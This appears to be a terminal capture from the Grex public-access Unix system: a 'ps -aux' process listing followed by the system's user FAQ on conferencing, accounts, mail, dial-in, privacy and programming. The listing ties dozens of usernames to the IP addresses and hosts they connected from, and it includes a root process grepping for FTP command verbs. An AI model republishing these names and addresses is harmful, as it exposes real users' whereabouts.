      root     25480  0.0  0.0   56   56 ?  S    16:08   0:46 telnetd ttyq1 35.8.1.4
      root     11004  0.0  0.0   56    0 ?  IW   18:06   0:03 telnetd ttys9 200.16.7.1
      nobody   11876  0.0  0.3  216  724 ?  S    18:13   0:05 /usr/local/libexec/httpd
      nes16    10580  0.0  0.0   48    0 q2 IW   18:03   0:00 /bin/sh /usr/local/bin/m
      abbagirl  2229  0.0  0.0   36    0 u9 IW   17:00   0:01 watch ...
      cfadm     3791  0.0  0.0  128    0 q1 IW   17:11   0:09 bbs
      jackal   13078  0.0  0.1   40  212 rc S    18:19   0:01 last
      archer    4105  0.0  0.0 1180    0 r9 IW   17:13   0:14 pine
      mauricio 11043  0.0  0.0   68    0 s9 IW   18:06   0:02 -csh (csh)
      root     10237  0.0  0.0   56   60 ?  S    18:01   0:11 telnetd ttyu0 137.224.19
      ryan     12439  0.0  0.1   44  268 q5 S    18:16   0:02 /a/r/y/ryan/pfilt/filter
      thea     10395  0.0  0.0   68    0 u1 IW   18:02   0:01 -csh (csh)
      mbollman 12350  0.0  0.0   28    0 p7 IW   18:16   0:00 /bin/sh /usr/local/bin/h
      mbollman 12551  0.0  0.0   40    0 p7 IW   18:17   0:00 more -d /usr/local/grexd
      root     26165  0.0  0.0   56   60 ?  S    16:12   0:18 telnetd ttyr3 165.215.30
      jackal   10254  0.0  0.0   68    0 rc IW   18:01   0:01 -csh (csh)
      joe      13308  0.0  0.5  252 1188 t8 S    18:20   0:00 pine
      jiffer   26334  0.0  0.0   36    0 r3 IW   16:13   0:02 watch ...
      root     10244  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyrc 206.10.105
      shrike   28123  0.0  0.0  272    0 te IW   16:25   0:02 -tcsh (tcsh)
      jopap     9888  0.0  0.0   68    0 sa IW   17:58   0:02 -csh (csh)
      menuadm  11948  0.0  0.0   60   88 u0 S    18:13   0:03 talk prime
      keesan   12650  0.0  0.0   68    0 qe IW   18:17   0:02 -csh (csh)
      krj      25547  0.0  0.0   36    0 q1 IW   16:09   0:02 watch ...
      root      3679  0.0  0.0  144    0 ?  IW   Oct 14 37:59 /usr/local/libexec/sshd
      greg99   12558  0.0  0.0  156    0 u8 IW   18:17   0:02 -bash (bash)
      jackal   12829  0.0  0.0  328    0 rc TW   18:18   0:30 ps -aux
      party    29735  0.0  0.0   80  104 ue S    16:38   0:07 /usr/local/bin/party_
      tadeu    16231  0.0  0.0  796    0 ?  IW   12:39   0:01 ftpd: 200.249.132.149: t
      root     13305  0.0  0.1  252  208 ?  S    18:20   0:00 sendmail: startup with l
      root      8487  0.0  0.0   56    0 ?  IW   17:45   0:04 telnetd ttyt4 202.60.130
      jackal   12987  0.0  0.0   48    0 rc IW   18:19   0:00 /bin/sh /usr/local/bin/m
      cfadm    12155  0.0  0.0   96    0 qd IW   18:15   0:01 bbs
      party    11136  0.0  0.1   72  140 td S    18:07   0:02 /usr/local/bin/party_
      rjh123   11441  0.0  0.0  428  124 q8 IW   18:09   0:07 pine
      root     10897  0.0  0.0   56   56 ?  S    18:05   0:08 telnetd ttyt1 209.138.42
      root      2642  0.0  0.0   56   56 ?  S    17:02   0:17 telnetd ttype 161.233.38
      vetri     7729  0.0  0.1   80  160 q3 S    17:39   0:03 -csh (csh)
      party    10050  0.0  0.0   60  104 pe S    17:59   0:04 /usr/local/bin/party_
      mikeaa   12286  0.0  0.1   72  156 t1 S    18:16   0:07 /bin/sh ./configure
      shooter   4464  0.0  0.0  800    0 ?  IW   14:53   0:03 ftpd: 212.49.231.161: sh
      mooncat  11921  0.0  0.0   68    0 t3 IW   18:13   0:01 -csh (csh)
      cfadm    11016  0.0  0.0   96    0 td IW   18:06   0:01 /usr/local/bin/bbs
      pfv      10369  0.0  0.1   52  200 u2 S    18:02   0:07 /a/p/f/pfv/bin/pfilt
      root     16844  0.0  0.0  496    0 ?  IW   Oct 17  1:23 /usr/local/libexec/sshd
      mdw      22714  0.0  0.0   76    0 u5 IW   Oct 14  0:06 -csh (csh)
      bebbe346  8506  0.0  0.0   68    0 t4 IW   17:45   0:01 -csh (csh)
      pinhead  12766  0.0  0.0  796    0 ?  IW   18:18   0:02 ftpd: a03169.sp.mandic.c
      root     29798  0.0  0.0   40    0 ?  IW   06:03   0:00 in.ntalkd
      shrike    2942  0.0  0.0  224    0 te IW   17:05   0:03 elm
      somesh   11379  0.0  0.0   28    0 s4 IW   18:09   0:00 /bin/sh ./q
      party     7116  0.0  0.1   60  320 q1 S    17:35   0:07 /usr/local/bin/party_
      root     12718  0.0  0.0   56    0 ?  IW   12:08   0:35 telnetd ttyq7 edsel.smud
      root     15158  0.0  0.0   56    0 ?  IW   12:30   0:43 telnetd ttyq0 inet.bdsi.
      root     11000  0.0  0.2   56  436 ?  S    18:06   0:05 telnetd ttytd 128.196.22
      thea     10435  0.0  0.0   48    0 u1 IW   18:02   0:00 /bin/sh /usr/local/bin/m
      root       134  0.0  0.0   56    0 ?  IW   16:40   0:49 telnetd ttypa 129.115.11
      sys      10314  0.0  0.0   36   44 ?  I    11:54   0:09 in.identd -w -t300 -l
      ryan     12424  0.0  0.1   36  152 q5 S    18:16   0:00 /a/r/y/ryan/watch ...
      root      2470  0.0  0.0   68    0 u5 TW   Oct 17  0:02 -sh (csh)
      sys      26321  0.0  0.0   48    0 ?  IW   Oct 11  0:00 in.identd -w -t300 -l
      mikeaa   10916  0.0  0.0  156    0 t1 IW   18:05   0:03 -bash (bash)
      root     26487  0.0  0.0   56   60 ?  S    19:26   1:47 inetd
      neya     15160  0.0  0.0   72    0 q0 IW   12:30   0:06 -csh (csh)
      root       120  0.0  0.0   56   56 ?  R    16:40  40:18 telnetd ttyr2 147.225.19
      krj      25545  0.0  0.0   36    0 q1 IW   16:09   0:03 watch ...
      root     13219  0.0  0.2   56  432 ?  S    18:20   0:01 telnetd ttys3 24.112.155
      sj2       8398  0.0  0.0  144    0 t5 IW   17:45   0:01 -bash (bash)
      keesan   12720  0.0  0.0   48   60 qe S    18:18   0:00 mail wlevak
      nes16    10616  0.0  0.0  448    0 q2 IW   18:03   0:02 pine
      root     10058  0.0  0.0   56    0 ?  IW   17:59   0:02 telnetd ttyqb 24.30.48.8
      nats     12725  0.0  0.0   68    0 q7 IW   12:08   0:05 -csh (csh)
      abbagirl  2171  0.0  0.0   64    0 u9 IW   16:59   0:02 -csh (csh)
      party    26762  0.0  0.1   80  208 r3 S    16:16   0:11 /usr/local/bin/party_
      party    12225  0.0  0.1   72  180 qd S    18:15   0:01 /usr/local/bin/party_
      root     10287  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyu2 216.93.16.
      ryan     12318  0.0  0.0   68    0 q5 IW   18:16   0:01 -csh (csh)
      root     12644  0.0  0.0   56   60 ?  S    18:17   0:07 telnetd ttyqe 204.212.46
      jopap    13073  0.0  0.4  552  876 sa S    18:19   0:01 pico.real -z all
      root     13324  0.0  0.1  124  264 r0 S    18:21   0:00 login -h 204.212.46.132
      menuadm  11776  0.0  0.0   60   96 pc S    18:12   0:02 talk saloon
      wasf     12131  0.0  0.0   48    0 q6 IW   18:15   0:00 /bin/sh /usr/local/bin/m
      root      9139  0.0  0.3  480  668 ?  S    17:51   0:17 sendmail: HAA21168 hcldl
      wasf     12185  0.0  0.3  460  620 q6 S    18:15   0:03 pine
      pfv      10360  0.0  0.0  192    0 u2 IW   18:02   0:01 tcsh -c ~pfv/bin/pfilt
      party    12426  0.0  0.1   80  336 q5 S    18:16   0:01 eggdrop
      root     10736  0.0  0.0  396    0 ?  IW   18:04   0:10 sendmail: FAA18438 rings
      greg99   12719  0.0  0.0  348    0 u8 IW   18:18   0:01 lynx
      party    10347  0.0  0.0   80  112 u2 S    18:01   0:04 /usr/local/bin/party_ #p
      root     13154  0.0  0.0  120    0 sb IW   18:20   0:00 login -h 63.23.174.219 -
      root     11357  0.0  0.0   56   60 ?  IW   18:09   0:07 telnetd ttyq8 207.91.203
      root     13276  0.0  0.0   92  188 ?  IW   18:20   0:00 mail -r reenaf@hotmail.c
      root      7217  0.0  0.0   96  104 ?  IW   20:57   0:06 egrep USER|STOR|RETR|LIS
      nobody   11759  0.0  0.3  216  680 ?  S    18:12   0:01 /usr/local/libexec/httpd
      root     11668  0.0  0.0   56    0 ?  IW   18:11   0:01 telnetd ttyp7 152.171.23
      root         0  0.0  0.0    0    0 ?  D    Oct 10154:26 swapper
      mystar   12365  0.0  0.1  504  340 tf S    18:16   0:05 lynx sports.yahoo.com
      joe      13217  0.0  0.0   68    0 t8 IW   18:20   0:01 -csh (csh)
      nobody   11761  0.0  0.3  216  708 ?  S    18:12   0:03 /usr/local/libexec/httpd
      > faq
                     Frequently Asked Questions About Grex
       
      General
       
      * What is Grex?
       
      Grex is a public-access computer conferencing system in Ann Arbor, Michigan,
      USA. It is cooperatively owned and operated, and is
      supported entirely by donations from users. All staff members are volunteers.
       
      * What does the name "Grex" mean?
       
      Grex is not an acronym. It is a Latin word meaning "flock". It is the root of
      a number of familiar English words such as aggregate,
      congregate, and gregarious.
       
      * What can I do on this system?
       
      Grex provides all of the following services for free.
       
        o Electronic conferencing using "PicoSpan" or "Backtalk"
        o Internet e-mail using "mail", "elm", "pine" or "mh"
        o Browse the web in text mode using "lynx"
        o Access to usenet via "lynx" to the dejanews web site
        o Multichannel real-time chat using "party"
        o Free text-only web site hosting.
        o On-line games, including "Nethack"
        o Access to a Unix shell account, with all standard commands
        o Access to the C/C++ compiler, assembler, and other development tools
       
      However, Grex does not provide any of the following services at all:
       
        o Download areas
        o Mailing lists
        o Bots (for IRC or anything else)
        o Graphical web page hosting
        o A place to store files
       
      And there are a few things you can only do if you are a member (who has made a
      donation and sent ID). These are
       
        o Vote in Grex elections.
        o Serve on the board of Cyberspace Communications.
        o Access telnet, ftp, and irc sites from Grex.
        o Access web sites running on unusual ports, via lynx from Grex.
       
      * What operating system is Grex running?
       
      Grex is running SunOS 4.1.4 on a Sun 4/670 MP with dual processors. It is not
      Linux, but it is Unix, so in many ways it is similar to
      Linux. There are a lot of details about Grex's configuration available in the
      Grex staff notes on the web.
      http://www.cyberspace.org/staffnote/ Follow the link to Grex's Hardware and
      software.
       
      ----------------------------------------------------------------------------
       
      Conferencing
       
      * What is "computer conferencing?"
       
      A computer conference is an area set aside for discussion on some general
      topic, such as computers, politics, or gardening. In such
      an area, people can read what other people have posted, and can introduce new
      subtopics or add responses to existing ones. On
      many systems, conferences are called "forums". Grex has many conferences. For
      a complete list, see
      http://cyberspace.org/cgi-bin/bt/pistachio/conflist.
       
      * How can I participate in Grex's conferences?
       
      Grex's conferences are accessible by a text-based terminal interface or by the
      World Wide Web. To access the text-based interface,
      either dial direct or telnet to Grex and run the "bbs" command. (This command
      is run automatically every time you log in if you
      choose the "bbs shell" when you create your account.) World Wide Web access is
      provided by Grex's "Backtalk" conferencing
      software. Please see http://cyberspace.org/backtalk.html for details on using
      Backtalk.
       
      ----------------------------------------------------------------------------
       
      Governance
       
      * How is Grex governed?
       
      Cyberspace Communications functions as an online democracy, with policies set
      by its users. The Co-op Conference is open to all
      users and provides a forum for discussing policy issues. The Board of
      Directors, elected by the members, is the formal governing
      body and uses consensus in the Co-op Conference as its primary guide for
      making decisions. Any member of Grex who can attend
      the monthly meetings, held in Ann Arbor, Michigan, is eligible to run for the
      Board of Directors. In addition, any member can call a
      binding vote by the membership on any policy issue. The Articles of
      Incorporation and Bylaws can be viewed online.
       
      * How can I participate in Grex governance?
       
      Any user can have a voice in Grex governance by joining the Co-op conference
      and participating in the discussions there. If you
      wish to be eligible to vote in Grex elections and to run for the Board of
      Directors, you can become a Grex member. Membership
      dues are US$6/month or US$60/year. To find out how to make membership
      payments, please see
      http://cyberspace.org/member.html. Membership donations are Grex's primary
      source of financing.
       
      * Can I pay for membership by credit card?
       
      Unfortunately, no. Grex has investigated the possibility of accepting
      memberships by credit card, but the setup cost and monthly
      charges that we would have to pay to the bank are too high for us to pay. We
      do accept personal checks in US funds drawn on a US
      bank, US currency (not recommended to send by mail), and international money
      orders.
       
      ----------------------------------------------------------------------------
       
      How do I ... ?
       
      * How do I change my name, my shell, my mail forwarding, my password, or my
      terminal type?
       
      You can change any of these properties of your account with the "change"
      command. If you are using a menu or if you are at a bbs
      (Ok) prompt, type "!change" If you are in lynx, type "!" (an exclamation
      point) to get to a shell prompt first. At a shell prompt, type
      "change" and follow the menu-based instructions.
       
      * How do I change my login ID?
       
      You can't change it. Instead, you have to create a new account with the login
      ID that you wish. Once you have done that, you can
      copy the files that you need from your old account to your new one. When you
      no longer need your old account, you can ask to have
      it deleted by sending a request from your old account to staff@cyberspace.org.
       
      * How do I set up a web page?
       
      There is a completely separate FAQ for all questions related to the Grex web
      server. Please see
      http://www.cyberspace.org/local/grex/wwwfaq.html.
       
      * How do I run irc?
       
      Unless you are a paying member, you can't use IRC because the protocol is
      blocked for free accounts. For more detailed
      information about this, see the Grex Eggdrop Page from the Grex Staff Notes.
       
      If you are a guest user, you cannot access IRC. You can chat on-line within
      the Grex community by using "party" (see chatting,
      below). Paying members just need to type "irc" to run the ircii client
      program, which is installed for this purpose.
       
      * How do I chat with others?
       
      Grex has six ways of chatting:
       
        o 'party' is a chat program that many people can run at once.
        o 'write' sends text to the other person's screen one line at a time.
        o 'chat' is like 'write' but it sends one character at a time.
        o 'tel' is like 'write' but it sends only one line and then stops.
        o 'talk' splits the screen in half, so both people can type at once.
        o 'ytalk' is like talk but can accommodate more than two people.
       
      * How do I find out who is waiting to log in?
       
      You can't find which accounts are waiting. People don't log in until after
      they get out of the telnet queue, so the system doesn't
      actually know who the people in the queue are.
       
      You can get some amount of information about who is in the queue. The command:
       
          fixwait -l
       
      will give you a list of the IP addresses that people on Grex are coming from,
      including people in the queue. If your friend has a
      unique IP address, you may be able to recognize it in the list.
       
      * How do I get out of vi?
       
      vi (pronounced vee-eye) is a powerful text editor, but it has a steep learning
      curve at first. You can usually tell that you are in vi
      when you have a vertical line of squiggles (tildes) on the left of your
      screen. If you are trapped in vi, remember to type the escape
      key and then :q! (colon-q-exclamation point) followed by a return. The pico
      editor is a much friendlier editor for less experienced
      users.
       
      * How do I access Usenet news?
       
      Grex does not maintain its own base of Usenet news, because this requires too
      much space and too much of our internet link. So
      there is no usenet client program on Grex. However, you can access Usenet via
      the "lynx" web browser. Just connect to
      http://dejanews.com/.
       
      * How do I run X-windows?
       
      Grex does not support graphical interfaces such as X-windows. This service
      requires many more resources than the text-based
      service that Grex provides. It would use far too much CPU time and bandwidth
      for Grex to be able to support it.
       
      * How do I restore a lost file from a backup tape?
       
      We can't do that. We just don't have time. Grex makes regular backups onto
      tape, but this is an enormously time consuming
      process. The purpose of these backup tapes is to protect the system from
      disaster. Unfortunately, there is not enough time to honor
      requests from individual users to restore files from these tapes. Grex is not
      a good place to keep any file that you cannot afford to
      lose. If you have an important file on Grex, it is your responsibility to keep
      a backup of it on your own computer.
       
      * How do I get a list of Unix commands?
       
      There are so many Unix commands that we recommend that users who are not
      familiar with Unix use the "menu" command to
      explore Grex. The most common commands are available there. If you really want
      a list, then run the Grex command
      "listcommands" to print a list of most Unix commands on Grex. (Built-in shell
      commands are not included). This will take a long time
      to run.
       
      * How do I use Unix commands?
       
      The Unix operating system is amazingly powerful and flexible, with thousands
      of commands. Unix can be a challenge to get started
      with, but if you are interested in learning Unix, Grex is a good place to
      start, since we do give you access to almost all commands.
      For a good introduction to basic Unix and VI usage, see Christopher Taylor's
      witty tutorial Unix is a Four Letter Word, or the
      University of Edinburgh's UNIXhelp for Users pages. Jennifer Myers has a good
      page of Unix links at the UNIX Reference Desk.
       
      Online reference information about most commands can be called up via the
      "man" command. For example, for information about
      the date command, type
       
          man date
       
      ----------------------------------------------------------------------------
       
      Accounts and Passwords
       
      * Why do numbers appear before the login prompt?
       
      If you are telnetting to Grex when it is full, you must wait in a queue for a
      free port to telnet into. These numbers are telling you your
      place in line. There usually is no queue in the evenings in the eastern US and
      on weekends.
       
      * Why do I get a login prompt after I log out?
       
      This is in case there is a queue. it permits you to log in without waiting
      through the queue a second time. It is safe to disconnect
      when you are at the login prompt, or you can type "bye" or "exit" and Grex
      will disconnect.
       
      * Why does it say my new password is too obvious?
       
      Probably because it is too short, or only has lower case letters. It is
      important that internet vandals not be able to guess your
      password. Therefore, the Grex password change program is very particular about
      what it will accept. It is a good idea for your
      password to have at least 9 characters, at least one of which is an upper case
      letter, and at least one number or punctuation
      character embedded in it. Try the "genpass" program for some random passwords.
       
      * Why does it say my password is expiring?
       
      For security reasons, you should not keep the same password for too long. Grex
      passwords expire when they have not been
      changed for a whole year. All you have to do is run the "change" program to
      change your password, and you will stop getting
      nagged when you log in. Please remember to write your new password down when
      you change it, so you won't forget it.
       
      * Grex said, "3 failures since last login," when I logged in. What does this
      mean?
       
      When someone tries to log in to your account but does not know the password,
      Grex keeps count of failed login attempts. In general
      if there are only two or three of them, it probably means someone made a typo
      at the login prompt. This happens most often for
      accounts with very short user IDs and those with popular names, such as "ken".
      Less commonly, login failures may occur when
      someone runs telnet with the option to pass along the account name from
      another system. If it is a different account name, but
      matches yours, this will produce a failed login attempt for your account every
      time this person telnets to Grex.
       
      If there are 25 or 30 failed login attempts, or if the last successful login
      to your account wasn't yours, then it could mean that
      someone is trying to break in to your account. In general, most failed login
      attempts are from other people's typing errors and are not
      malicious. If you still suspect malicious activity, change your password
      (don't forget to write it down) and let the staff know so that
      they can investigate.
       
      * I can't remember my password. What do I do?
       
      Contact the Grex staff. Send mail from another site if you have access to
      email at another site. Send messages about access
      problems to staff@cyberspace.org. Remember to specify which account is the one
      you lost the password for.
       
      You can also log in to Grex as "trouble" without a password, which will send a
      message to the staff. Be sure to provide a postal
      address, an e-mail address, or a local telephone number, so that the staff can
      contact you in return.
       
      * I have a Grex account. Why do I get "No such loginid?"
       
      This means that your account has been deleted. Accounts on Grex are deleted if
      no one logs in for more than 3 months. There is not
      enough room on Grex to keep old unused accounts. To avoid losing your account,
      you should log in every month or two. Accessing
      your web page, or having your mail get forwarded does not count, but
      conferencing over the web using your account and password
      in Backtalk does count as logging in for this purpose.
       
      If your account has been deleted, it usually cannot be recovered or restored.
      Please feel free to recreate the account.
       
      * I don't want to use my account anymore. How do I get it deleted?
       
      If you don't want to wait until your account expires, you have to log in one
      last time and send a message to staff@cyberspace.org
      from the account that you want deleted. In your message, ask for it to be
      deleted.
       
      * Why can't I enter control-C when I am creating my account?
       
      When creating an account by telnet, you are asked to provide the characters
      you wish to use for various purposes. People using
      Macintosh NCSA Telnet have experienced the behavior that when they type ^C,
      the program exits rather than accepting the ^C as
      the designated control character.
       
      This is caused by undesirable preferences within that program and is easy to
      fix. Look at the "Session" menu, at the "Setup Keys"
      menu item (or hit command-S). You will probably find that you have a setting
      for "interrupt process" which is set to ^C. If so, NCSA
      Telnet is honoring this setting and sending the "interrupt process" signal
      (part of the time-worn telnet protocol) whenever you type
      ^C. Blank this setting out and then save your telnet set in a file. If you
      start telnetting by double clicking on the saved settings, you
      won't have to remember to clear it each time.
       
      ----------------------------------------------------------------------------
       
      E-Mail
       
      * How do I get Grex to forward my mail to another site?
       
      Use the "change" command. Just type "change" at a shell prompt or "!change" at
      any other prompt. This will invoke a menu that
      allows you to change almost any setting on your account, including the mail
      forwarding option. There are certain restrictions on the
      use of forwarding, so make sure you are following the rules..
       
      * I set up .forward myself. Why doesn't it work?
       
      Probably because it is not world readable. .forward files must be world
      readable in order to be valid on Grex. If you are looking for a
      way to forward your mail to an anonymous place, you need to find an anonymous
      remailer system. Grex doesn't do this. To make
      your .forward file world readable, change to your home directory (type: cd)
      and then issue this command:
       
          chmod 644 .forward
       
      Your home directory must also be world accessible; type:
       
          chmod 755 .
       
      or use 711 instead of 755 if you don't want other people to be able to scan
      your directory.
       
      * How can I hide my forwarding address?
       
      You can't. If you have forwarding enabled, the address must appear in the
      finger command. There is no way to hide the address that
      you are forwarding to. Grex does not wish to provide anonymous remailing
      services. You may wish to make use of one of the
      anonymous remailers listed on the Yahoo page
      http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_
      Mailers/.
       
      * How do I read mail with Netscape or Eudora?
       
      You can't. Those are POP clients, and Grex doesn't run a POP server. This is
      because Grex is intended to be an on-line community,
      and having a POP server would encourage people to use Grex as a mail drop
      instead, never logging on, and so never having a
      chance to become part of the Grex community. You must log in to Grex in order
      to read your mail.
       
      * My mailbox is getting heavily spammed. What can I do?
       
      Spam (unwanted mail) is unfortunately very common on the internet. Grex's mail
      transport system has numerous filters to reduce
      spam, but it does not eliminate it. The Grex staff may or may not be able to
      help you reduce the spam you are getting. The proper
      way to report spam is to forward a copy of one of the offending messages to
      abuse@cyberspace.org. Do not send multiple
      messages.
       
      The message you send MUST be accompanied by the full mail headers, so that we
      can determine its true origin. The origin of
      spam is often hidden, and may require detailed examination of these headers.
      If you use pine, you can view these headers with the
      "H" command.
       
      * Why is mail that I send to Grex getting rejected?
       
      This usually happens when the sending site is not configured properly.
      Problems in mail configuration can often lead to mail that
      has an invalid return address. Grex's mail system tries very hard to detect
      and reject invalid sending addresses, in order to reduce
      the amount of spam (unwanted mail) on Grex. If your mail looks like spam, then
      Grex will reject it. If you think this is happening to
      your legitimate mail, send a rejected copy of it to grex-staff@pmtech.com, and
      be sure to include all of the mail headers.
       
      Other common reasons for mail to Grex to be rejected are that it may be too
      large ( over 100k) or your mailbox may have grown too
      large (over 600k). Mail will be rejected in these cases.
       
      * Why does pine say that it cannot open my mail folder?
       
      Actually, that is probably just a faulty error message. For new accounts, it
      only means that you haven't received any mail yet. Once
      you receive some mail, the message should go away forever. We are working on
      getting rid of this error message.
       
      * How do I get pine to save my outgoing mail?
       
      This feature is turned off on Grex by default, because lots of new users were
      accumulating vast files of old mail without ever
      knowing that they were doing it. You're quite welcome to create the folder, as
      long as you keep an eye on your disk usage so that
      you don't exceed Grex's 1 megabyte limit for your account. To create your
      saved-mail folder, go into the pine configuration screen
      and look for the setting for "default-fcc". Set it to "saved-mail" or whatever
      name you would like to use. You need to use quotation
      marks around the file name.
       
      * How do I send attachments?
       
      Please do not send large attachments. If you have a small one, so that your
      mail remains under 100 K bytes in size, then you can
      send attachments from Grex.
       
      Once the file is in your home directory on Grex, then when composing a message
      in pine, put the file name on the attachments line.
      Please remember to delete the file after sending it as an attachment, so that
      you do not fill up your allotted disk space.
       
      * How can I view an attachment file named myfile.doc?
       
      Any file that ends with ".doc" is probably a Microsoft Word file. There is no
      way to view such a file on Grex. You will have to
      download that file to a computer that has Microsoft Word or some other word
      processor that can import such files.
       
      * How can I set the "From" header in pine for my outgoing mail?
       
      In Pine on Grex, you can't set the "From:" field. This is disabled because
      there were too many problems with people setting invalid
      addresses, which caused their outgoing mail to bounce to the postmaster
      whenever it was undeliverable.
       
      * How do I set up a mailing list here?
       
      You can't. We're sorry, but this is not permitted. You can only forward mail
      to a single site elsewhere on the internet. Mailing lists are
      too resource intensive for Grex to support. You may wish to try using an
      advertising-based free mailing list service. The Free Center
      maintains a rated list of free mailing list providers.
       
      * Is it OK to collect my mail by FTP?
       
      Yes, but you must do it correctly.
       
      It is a extremely risky to attempt to transfer your mail spool file directly
      off of Grex by FTP. You risk losing some or all of your
      collected mail, because the FTP daemon does not participate in the locking
      scheme used by the mail delivery programs on Grex. In
      addition, your account may appear to be abandoned because FTP connections do
      not update the date of last login. This could
      result in loss of your account if it is the only way you use Grex.
       
      Instead, we recommend telnetting to Grex and running a mail client program.
      These all do participate in the locking mechanism for
      the mail spool. Collect all of your mail into a file in your home directory,
      and then log out. You may now safely fetch that file in your
      home directory by FTP. Please remember to delete it once it has been safely
      transferred.
       
      * Why can't I get procmail to work?
       
      Procmail is a mail filtering program, but it stopped working when Grex
      reorganized its mail system to use hierarchical mail
      directories. Grex really needs to have the mail organized hierarchically
      because of the very large number of users receiving mail.
      We hope to see procmail restored some day, but at the moment it is broken, and
      no schedule has been established for correcting it.
       
      * Can I set up an autoresponder to answer my mail while I am away for a while?
       
      Yes. Try the vacation program. The instructions can be found by typing "man
      vacation".
       
      ----------------------------------------------------------------------------
       
      Dialing In
       
      * How can I dial into Grex?
       
      The short answer is to dial (734) 761-3000 with your terminal software set to
      8-N-1. This process is described in detail in Grex's
      dial-up access information page.
       
      * If Grex doesn't answer the phone, how many times should I let it ring?
       
      We try very hard to keep all of the modems working properly, but sometimes,
      you may encounter a failure. Grex's phone lines are all
      configured so that if one modem doesn't answer after 3 rings, you are
      automatically transferred to the next line in the trunk hunt. If
      there happens to be a stuck modem, you need to wait at least 4 rings before a
      second one gets a chance to work. If there are two
      bad modems, then 7 rings are required.
       
      * If I can't get on by calling (734) 761-3000, is there another number I can
        try?
       
      No. Grex used to publicize other numbers in the interior of the hunt group,
      but there is no longer any advantage to calling any other
      number, because of this automatic stepping feature. Even if Grex is down, the
      phone should pick up once it steps past any bad
      modems. If it is down for an extended period, you should receive a short
      explanation from the terminal server. If the terminal server
      has failed, or the power to Grex's building has failed, the phones will not
      answer, but these conditions are very rare.
       
      * Why can't I get file transfer to work except for small files?
       
      Probably because you don't have a modem cable that is capable of handling
      hardware flow control, or your modem doesn't support
      it or has the feature turned off.
       
      ----------------------------------------------------------------------------
       
      Privacy, Encryption, and Security
       
      * My personal information should be private. Why is it shown?
       
      When you look up your own user information, you can always see it, even if it
      is set up so that nobody else on the system can see it.
      To see what other people see, ask for the info about
      "youraccount@cyberspace.org" instead of just "youraccount".
       
      * How can I keep private the place I'm logged on from?
       
      This is considered public information on Grex. The only way to hide it is not
      to log on.
       
      * I am receiving unwanted chat requests. What can I do?
       
      You can adjust the chat settings for your account with the "change" command.
      To run it, type "change" at a shell prompt, or
      "!change" from a menu or from PicoSpan. Then choose "W) Write settings" and
      follow the menus from there. You can: turn off all
      chat requests, accept all chat requests, or select which users can and cannot
      chat with you.
       
      * How can I view my friend's files?
       
      Grex is a very open system, so directories are open to the public unless the
      owner decides to make them private. E-mail, however,
      is automatically saved in private files that the world cannot see.
       
      To permit a file so that it can be seen by others, type
       
          chmod a+r file-name
       
      To permit a directory, type
       
          chmod a+rx dir-name
       
      To hide a file or directory, type
       
          chmod ou-rx file-or-dir-name
       
      If you hide your home directory completely, neither mail forwarding nor web
      hosting will be available to you. You may make your
      directory accessible without being allowing it to be scanned. This is how:
       
          chmod 711 dir-name
       
      * Can I run PGP on Grex to protect my e-mail messages from being seen by
        others?
       
      No. PGP is not available on Grex for a number of reasons. The two most
      compelling reasons are that it would not be legal, and it
      would not offer you the protection you seek. We would like to see it be
      legally available to all, but in order to be effective, PGP must
      be installed on your own computer, not on Grex. Encrypting or decrypting a
      message on Grex would mean that the message would
      have to travel over an insecure network in plaintext before encryption or
      after decryption, and this is not the way to protect your
      message.
       
      In order to install PGP on your home computer, North American users should go
      to the MIT PGP Distribution Site at
      http://web.mit.edu/network/pgp.html, and all other users should use the
      international PGP home page at http://www.ifi.uio.no/pgp/.
       
      * Do you provide secure shell?
       
      Yes, we do. Secure shell (ssh) is a good way to connect because your session
      is encrypted, so that passwords cannot be
      intercepted by sniffers. Unfortunately, it is not fully functional on Grex,
      because the ssh daemon is unable to wait in line with telnet
      users when there is a queue, so ssh connections will fail when the system is
      full. You may see a message like this when it fails:
       
          Warning: no access to tty (Bad file number).
       
      When there is no queue you can use ssh to connect to Grex without any
      trouble..
       
      ----------------------------------------------------------------------------
       
      Programming
       
      * How do I compile a program?
       
      To compile a C program named foo.c, type gcc foo.c -o foo. This compiles foo.c
      and creates an executable program
      named foo. To run it, type ./foo Likewise, to compile a C++ program named
      foo.cpp, type g++ foo.cpp -o foo
      Please check with the Grex staff before compiling programs you bring in from
      the net. Most of the useful programs are already
      installed here, and many others will not run on Grex, but compiling them on
      Grex wastes a lot of bandwidth and cpu time 
      resources that Grex is short on.
       
      * Why can't I get the C compiler to compile my program?
       
      Probably you are using the wrong C compiler. Grex has two compilers installed.
      cc is only used for building certain system
      executables. It is not ANSI standard, and it lacks certain standard include
      files. You need to use gcc instead. This is a fairly recent
      version of the Gnu C compiler. It is ANSI standard and very complete.
       
      * I compiled my program. Why won't the system run it?
       
      Usually this is because the program is not on your path. Unlike a DOS or
      Windows system, on Unix the current directory is not
      automatically placed on your path. So if you compile a program named foo, you
      cannot run it by just typing "foo". You need either to
      place the executable somewhere on your path, or to precede its name with ./
      (dot-slash) so you would type "./foo".
       
      * Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo?
       
      No. These are all servers, daemons, or programs that remain running after you
      have logged out. No program run by users is
      allowed to run after you log out. See the Grex Eggdrop Page from the Grex
      Staff Notes.
       
      At one time or another, the possibility of our installing some of these as
      official services has been discussed in the "coop"
      conference. We have never yet decided to do so, but if you are interested in
      pursuing this possibility, the Grex coop conference is
      the place to make your request.
       
      * Can I have a copy of Grex's newuser program?
       
      Yes, you can find out more about newuser, including availability, on this web
      page: http://www.cyberspace.org/~mdw/newuser.html.
       
      * Can I have a copy of Grex's write/chat/tel programs?
       
      Yes, you can find out more about write/chat/tel, including availability, on
      this web page: http://www.wwnet.net/~janc/write.html.
       
      * Can I have a copy of Grex's party program?
       
      Yes, you can find out more about party, including availability, on this web
      page: http://www.wwnet.net/~janc/software.html.
       
      ----------------------------------------------------------------------------
       
      Miscellaneous
       
      * Why does my browser say "Can't find application" when I click on the "Telnet
      In" link?
       
      You need to configure your browser to find your telnet application program.
      The exact instructions for doing this vary widely
      depending upon both your operating system and your browser. In Netscape 3 this
      setting can be found in "Options"/"General
      preferences"/"Applications". Select the telnet application that came with your
      system, or one you downloaded from the internet. For
      more details about telnet applications, see the Grex Telnet Information page
      at http://www.cyberspace.org/telnet.html.
       
      * When I try to telnet to Grex, it hangs. Why can't I connect?
       
      There are several things that can go wrong.
       
